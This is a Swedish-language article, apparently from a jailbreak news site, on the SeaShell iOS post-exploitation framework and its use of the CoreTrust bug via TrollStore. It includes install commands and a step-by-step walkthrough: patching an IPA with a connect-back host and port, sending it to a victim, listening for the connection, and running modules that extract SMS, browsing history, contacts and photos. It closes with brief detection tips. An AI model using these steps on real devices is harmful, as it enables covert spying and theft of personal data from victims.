SeaShell Trojan Horse för iOS

Många användare uppfattar CoreTrust-buggen, som används av TrollStore IPA-installationsprogrammet, som en bekväm funktion som underlättar permanent installation av appar och justeringar utan begränsningar från någon källa på iPhones med iOS 14, iOS 15 och iOS 16. Den har dock en mörkare potential eftersom den kan utnyttjas för att i hemlighet ta kontroll över din iPhone, vilket möjliggör smygspionage på din enhet utan din vetskap.

Vad är snäckskal?

SeaShell är ett ramverk utformat för att patcha en IPA-fil för TrollStore eller Esign, vilket möjliggör injektion av skadlig kod. Denna skadliga programvara underlättar fjärranslutning till den riktade enheten och omvandlar den effektivt till en trojansk häst på ett intet ont anande offers iPhone eller iPad. SeaShell utnyttjar CoreTrust-buggen och opererar i smyg, vilket utgör betydande säkerhetsrisker för användarna. Patchad IPA måste installeras med TrollStore eller TrollStore 2.

iOS-ramverket SeaShell, som är ett efterutnyttjande ramverk för iOS, ger användare möjlighet att fjärråtkomst till, manipulera och extrahera data från utvalda enheter. Med sin mångsidiga arkitektur kan användare enkelt utveckla anpassade moduler skräddarsydda för specifika uppgifter. SeaShell är dock förutrustad med flera viktiga moduler utformade för att extrahera känslig information sömlöst. Dessutom kan du uppdatera IPA:n med Trojan Horse.

För att starta processen behöver man bara generera en modifierad IPA-fil, som sedan kan installeras på målenheten via kanaler som TrollStore eller någon annan IPA-installationsprogramvara som kan kringgå CoreTrust-begränsningar. När applikationen har installerats behöver målenheten bara starta appen en gång och stänga den.

Bland dess funktioner erbjuder SeaShell moduler för att extrahera kritiska datapunkter. Användare kan till exempel använda en modul för att hämta detaljerad kontaktinformation som lagras i filen AddressBook.sqlitedb. Dessutom kan användare visa systeminformation som enhet och installerad iOS-firmware, och ladda ner foton som är tillgängliga på enheten eller i iCloud.

Dessutom underlättar SeaShell utforskningen av Safari-bokmärken och webbhistorik, vilket ger användarna möjlighet att fördjupa sig i den aktuella enhetens digitala fotavtryck. Den här funktionen möjliggör extrahering och lagring av webbdata i ett bekvämt JSON-format för analys.

Dessutom innehåller ramverket moduler dedikerade till att komma åt röstmeddelandedata från filen voicemail.db, vilket ger insikter i kommunikationsmönster och interaktioner. Dessutom tillhandahåller SeaShell funktionalitet för att ladda ner eller visa SMS-data, vilket gör det möjligt för användare att övervaka och analysera textmeddelandeutbyten och därmed potentiellt avslöja värdefulla insikter eller bevis.

Sammanfattningsvis erbjuder SeaShell inte bara en flexibel plattform för att utveckla anpassade moduler utan inkluderar även en uppsättning färdiga verktyg som syftar till att extrahera känslig information från iOS-enheter.

Obs: SeaShell kräver att användare laddar ner en modifierad IPA-fil, sidladdar den till enheten med TrollStore och kör den minst en gång för att kompromettera enheten.

Denna omfattande uppsättning funktioner understryker ramverkets effektivitet i scenarier efter utnyttjande, och belyser dess potential för både legitima och skadliga syften.

SeaShell har en oerhört kraftfull funktion: möjligheten att ansluta till olika applikationer, inklusive men inte begränsat till Contacts.app. Genom denna funktion får användare oöverträffad kontroll, vilket gör det möjligt för dem att ersätta systemappar, fördjupa sig i appbehållare, lägga till nya processer, uppdatera körbara filer, ändra körbara behörigheter, ladda upp patchar och mer. Det finns också ett inbyggt alternativ för att styra offrets spelare med alternativ som stopp, spela, nästa osv.

Den här funktionen låter användare flytta den trojanska hästen för iOS till olika appar, inklusive systemappar som Kalkylator, Kontakter etc.

Potentialen för utnyttjande känner inga gränser, då SeaShell erbjuder ett brett utbud av möjligheter till sofistikerade attacker och manipulationer. SeaShell utnyttjar de formidabla funktionerna hos en avancerad nyttolast som kallas Pwny, känd för sin uppsjö av funktioner utformade för att underlätta invecklade utnyttjandetaktiker. Med Pwny i kärnan erbjuder SeaShell användarna ett robust ramverk för att utföra sofistikerade manövrar inom cybersäkerhet.

Hur man installerar SeaShell

SeaShell är ett Python-skript som enkelt kan installeras via pip-pakethanteraren. För att konfigurera SeaShell Framework, mata helt enkelt in följande kommando i din terminal:

 pip3 install git+https://github.com/EntySec/SeaShell

Pwny är en implementering av en avancerad nyttolast skriven i ren C och designad för portabilitet och utökningsbarhet för iOS-enheter. Använd följande kommando för att installera pwny:

 pip3 install git+https://github.com/EntySec/HatSploit

Hur man använder SeaShell Framework

SeaShell använder sitt applikationspaket som består av en enkel körbar fil tillsammans med en annan körbar fil som ansvarar för att initiera Pwny-nyttolasten. Detta verktyg gör det möjligt för användare att modifiera vilken IPA-fil som helst, t.ex. genom att uppdatera justerad Instagram IPA med den trojanska hästen. Det finns också ett alternativ att skapa en IPA-fil som innehåller skadlig kod med ett falskt namn och en falsk ikon.

Steg 1. Öppna terminalappen och kör seashell-kommandot för att köra ramverket.

 seashell

Steg 2. Uppdatera en IPA-fil och ange din IP-adress och port för anslutningen.

(seashell)> ipa patch Instagram.ipa
Host to connect back: 192.168.0.1 
Port to connect back: 8888 
IPA at Instagram.ipa patched.

Steg 3. Skicka IPA:n till offret för installation via TrollStore.

Steg 4. Öppna lyssnaren på din dator och vänta på anslutningen.

 (seashell)> listener on 0.0.0.0:8888

Steg 5. Efter lyckad anslutning, kör moduler t.ex. safari_history, player, sysinfo, sms, devices, ipa, voicemail, photos, safari_bookmarks, contacts etc.

 pwny:/ root# safari_history History.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s History.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s [*] Parsing history database... History: Date URL ---- --- 2024-02-28 09:35:57 https://onejailbreak.com pwny:/ root#

För att bevilja åtkomst till SMS-data kan du lista chattarna som finns i SMS-appen med kommandot sms -l, eller extrahera chatthistoriken med en specifik kontakt med sms .

 pwny:/ root# sms 123456789 sms.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s sms.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s [*] Parsing SMS for 123456789... Sms (11111111111): ID Date Status Text -- ---- ------ ---- 1 2024-02-28 11:01:21 Sent Vist ONEJailbreak.com pwny:/ root#

Hur man upptäcker Seashell-trojansk häst

För att minska risken att bli offer för attacker via SeaShell-ramverket kan du följa några förslag på hur du kan identifiera standardkonfigurationen för SeaShell-patchade IPA-filer. Projektet är dock öppen källkod och kan enkelt modifieras för att ändra värdena till anpassade.

1. Packa upp IPA-filen som du tänker installera.
2. Kontrollera app-paketet för en körbar fil som heter "mussel", som fungerar som en representation av Pwny-nyttolasten.
3. Undersök Info.plist-filen och leta efter "CFBundleBase64Hash", som innehåller ett värdpar kodat med base64 (:).
4. Verifiera filens hashsumma för att säkerställa dess integritet innan du fortsätter med installationen.

Skrivet av

Kuba Pawlak

Kuba har över 20 års erfarenhet inom journalistik, med fokus på jailbreak sedan 2012. Han har intervjuat yrkesverksamma från olika företag. Förutom journalistik specialiserar sig Kuba på videoredigering och drönarflygning. Han studerade IT på universitetet innan sin författarkarriär.

Skriv en kommentar